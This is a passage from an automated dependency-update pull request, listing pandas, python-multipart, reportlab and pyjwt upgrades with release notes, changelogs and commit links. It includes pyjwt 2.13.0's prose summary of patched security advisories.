href=\"https://github.com/pandas-dev/pandas/commit/1c6d1e30cc4b80bedb769a8b3731b0788f69c9dc\"\u003e\u003ccode\u003e1c6d1e3\u003c/code\u003e\u003c/a\u003e [backport 3.0.x] PERF: remove special casing for zoneinfo in tz_localize_to_u...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/2a547116afc46d88d4e6584670fd793949222a1e\"\u003e\u003ccode\u003e2a54711\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/64379\"\u003e#64379\u003c/a\u003e on branch 3.0.x (PERF: improve performance with ZoneInfo t...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/036bb7c0e7160b9d5a7f6bd26a9fc00921fa6977\"\u003e\u003ccode\u003e036bb7c\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65482\"\u003e#65482\u003c/a\u003e on branch 3.0.x (PERF: don't call unique on dtypes for che...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/bf4c182b09251f5b469e8e246ae3ea3e1ae07164\"\u003e\u003ccode\u003ebf4c182\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65410\"\u003e#65410\u003c/a\u003e on branch 3.0.x (TST: also convert str index to object in ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/dd02d75ce219135f9f3f65c13644d4be35585d42\"\u003e\u003ccode\u003edd02d75\u003c/code\u003e\u003c/a\u003e [backport 3.0.x] BUG: keep fsspec OpenFile alive for chained URL reads (\u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/6547\"\u003e#6547\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/aef3d0f6698667262c6d6ffc69180b280b0fa86a\"\u003e\u003ccode\u003eaef3d0f\u003c/code\u003e\u003c/a\u003e [backport 3.0.x] CI: lowercase types-pymysql/types-pyyaml to fix mamba 2.6.0 ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/bb8e24876273a14322047f4b89e648f6a4abebae\"\u003e\u003ccode\u003ebb8e248\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65399\"\u003e#65399\u003c/a\u003e on branch 3.0.x (DOC: fix source link for classes in the r...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pandas-dev/pandas/compare/v3.0.2...v3.0.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `python-multipart` from 0.0.26 to 0.0.30\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/python-multipart/releases\"\u003epython-multipart's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.0.30\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eTreat only \u003ccode\u003e\u0026amp;\u003c/code\u003e as the urlencoded field separator by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/290\"\u003eKludex/python-multipart#290\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore RFC 2231 extended parameters in \u003ccode\u003eparse_options_header\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/291\"\u003eKludex/python-multipart#291\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.29...0.0.30\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.29...0.0.30\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.29\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed RFC 2231 continuations in \u003ccode\u003eparse_options_header\u003c/code\u003e by \u003ca href=\"https://github.com/manunio\"\u003e\u003ccode\u003e@​manunio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/270\"\u003eKludex/python-multipart#270\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.28...0.0.29\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.28...0.0.29\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.28\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up partial-boundary tail scan via \u003ccode\u003ebytes.find\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/281\"\u003eKludex/python-multipart#281\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCap multipart boundary length at 256 bytes by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/282\"\u003eKludex/python-multipart#282\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.27...0.0.28\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.27...0.0.28\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.27\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePass parse offsets via constructors by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/268\"\u003eKludex/python-multipart#268\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd multipart header limits by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/267\"\u003eKludex/python-multipart#267\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.26...0.0.27\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.26...0.0.27\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/python-multipart/blob/main/CHANGELOG.md\"\u003epython-multipart's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.0.30 (2026-05-31)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eParse \u003ccode\u003eapplication/x-www-form-urlencoded\u003c/code\u003e bodies per the WHATWG URL standard, treating only \u003ccode\u003e\u0026amp;\u003c/code\u003e as a field separator \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/290\"\u003e#290\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eIgnore RFC 2231/5987 extended parameters (\u003ccode\u003ename*\u003c/code\u003e, \u003ccode\u003efilename*\u003c/code\u003e) in \u003ccode\u003eparse_options_header\u003c/code\u003e, keeping the plain parameter authoritative per \u003ca href=\"https://datatracker.ietf.org/doc/html/rfc7578#section-4.2\"\u003eRFC 7578 §4.2\u003c/a\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/291\"\u003e#291\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.29 (2026-05-17)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed RFC 2231 continuations in \u003ccode\u003eparse_options_header\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/270\"\u003e#270\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.28 (2026-05-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up partial-boundary tail scan via \u003ccode\u003ebytes.find\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/281\"\u003e#281\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCap multipart boundary length at 256 bytes \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/282\"\u003e#282\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.27 (2026-04-27)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd multipart header limits \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/267\"\u003e#267\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003ePass parse offsets via constructors \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/268\"\u003e#268\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/9d3ead568a259f222cff6425262ff63e88d930d4\"\u003e\u003ccode\u003e9d3ead5\u003c/code\u003e\u003c/a\u003e Version 0.0.30 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/3506c15ce99cb62faf2d5ceb3c4c1e5800cb843d\"\u003e\u003ccode\u003e3506c15\u003c/code\u003e\u003c/a\u003e Ignore RFC 2231 extended parameters in \u003ccode\u003eparse_options_header\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/d69df35cd2cad9c72794c2c340db646afae957d8\"\u003e\u003ccode\u003ed69df35\u003c/code\u003e\u003c/a\u003e Treat only \u003ccode\u003e\u0026amp;\u003c/code\u003e as the urlencoded field separator (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/1e6ff9740b09fb439755f30e2b0e2ada1d297325\"\u003e\u003ccode\u003e1e6ff97\u003c/code\u003e\u003c/a\u003e Bump idna from 3.11 to 3.15 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/e3d6853978b91b77e9739d47389124d633894c39\"\u003e\u003ccode\u003ee3d6853\u003c/code\u003e\u003c/a\u003e Version 0.0.29 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/a60dcdcb34d55b396ced6f5bdb1d1e6df84832ae\"\u003e\u003ccode\u003ea60dcdc\u003c/code\u003e\u003c/a\u003e Handle malformed RFC 2231 continuations in \u003ccode\u003eparse_options_header\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/270\"\u003e#270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/75c33b24d91f1e3c65b597832984d6c46d1a38df\"\u003e\u003ccode\u003e75c33b2\u003c/code\u003e\u003c/a\u003e Add 7-day cooldown for dependency resolution via uv exclude-newer (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/a078b8ef00474c3f3a6cf750cd092cf880354a11\"\u003e\u003ccode\u003ea078b8e\u003c/code\u003e\u003c/a\u003e Bump urllib3 from 2.6.3 to 2.7.0 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/285\"\u003e#285\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/7d8d28b210ac6cb055399562b0dc0e5cf9aef14a\"\u003e\u003ccode\u003e7d8d28b\u003c/code\u003e\u003c/a\u003e Version 0.0.28 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/284\"\u003e#284\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/b0dd125457d0f98de23bf2f894aedb1a54639d4e\"\u003e\u003ccode\u003eb0dd125\u003c/code\u003e\u003c/a\u003e Cap multipart boundary length at 256 bytes (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/282\"\u003e#282\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.26...0.0.30\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `reportlab` from 4.4.10 to 4.5.1\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 